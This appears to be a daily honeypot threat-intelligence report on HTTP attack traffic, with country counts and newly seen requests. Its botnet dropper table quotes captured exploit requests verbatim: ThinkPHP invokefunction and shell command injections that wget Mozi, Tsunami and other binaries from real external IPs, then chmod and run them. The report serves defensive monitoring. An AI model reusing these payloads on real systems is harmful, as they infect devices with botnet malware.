Daily Report: 2025-04-06#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 12 stage 1 IP address(es), linked to 8 dropper URL(s).
There are 14 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1678 requests were recorded during the day, originating from 12 different countries, with a peak of 475 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Germany |
SG | Germany |
SG | Germany |
US | Germany |
PT | Dubai |
GB | Dubai |
GR | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
117.72.64.87 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws HTTP/1.1 |
92.46.231.58 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://92.46.231.58:47963/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
31.170.22.205 | GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/tmp;wget+http://31.170.22.205/dl18;busybox+wget+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1 |
36.41.184.119 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
123.157.136.106 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
27.128.156.189 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
84.2.63.245 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
60.249.212.60 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.84.71.195/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
61.61.62.201 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
217.160.89.196 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://45.137.70.156/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
58.96.82.116 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
92.52.235.131 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
25 | 4 | GET http://ip-api.com/json/ HTTP/1.1 |
203 | 2 | info |
227 | 1 | *IDN? |
426 | 1 | \x00\x0E8\x9B\xD9\xA2\xD6\xAE\x01\x97\x0F\x00\x00\x00\x00\x00 |
443 | 1 | GET /socket.io/1/?t=1743975286971 HTTP/1.1 |
465 | 1 | GET /BFqc HTTP/1.1 |
468 | 1 | \x00\x0E83\xBA\x06\x1A\xE0\x15Je\x00\x00\x00\x00\x00 |
475 | 1 | GET /cha0 HTTP/1.1 |
515 | 1 | POST /ucmdb-ui/cms/loginRequest.do;?customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB HTTP/1.1 |
520 | 1 | \x00\x0E8Q\x10\x86OX\xA3\x22\xA6\x00\x00\x00\x00\x00 |
537 | 1 | \x00\x0E8\xC6\xB4’\x09\xA8\xD8\x82\x9A\x00\x00\x00\x00\x00 |
568 | 1 | GET /DjMa HTTP/1.1 |
594 | 1 | GET /OExP HTTP/1.1 |
616 | 1 | \x00\x0E8(\x07\xE1\xD8\xCCX\x9A;\x00\x00\x00\x00\x00 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 475 | GB |
1 | 196 | NL |
2 | 138 | US |
3 | 117 | BG |
4 | 105 | IL |
5 | 81 | DE |
6 | 74 | PL |
7 | 62 | CN |
8 | 55 | SC |
9 | 49 | SG |
10 | 40 | PT |
11 | 36 | GR |
12 | 28 | AZ |
13 | 24 | JP |
14 | 21 | NG |
15 | 19 | UA |
16 | 17 | HK |
17 | 17 | ID |
18 | 15 | LV |
19 | 14 | IN |
20 | 12 | CH |
21 | 9 | CA |
22 | 8 | FR |
23 | 8 | VN |
24 | 7 | LT |
25 | 6 | BE |
26 | 5 | RU |
27 | 4 | MD |
28 | 4 | AO |
29 | 4 | HR |
30 | 4 | HU |
31 | 2 | IT |
32 | 2 | ES |
33 | 2 | AU |
34 | 2 | BR |
35 | 2 | KR |
36 | 2 | EC |
37 | 2 | GH |
38 | 2 | TW |
39 | 2 | AR |
40 | 1 | ZA |
41 | 1 | MC |
42 | 1 | CZ |
43 | 1 | AE |
44 | 1 | NO |
45 | 1 | KZ |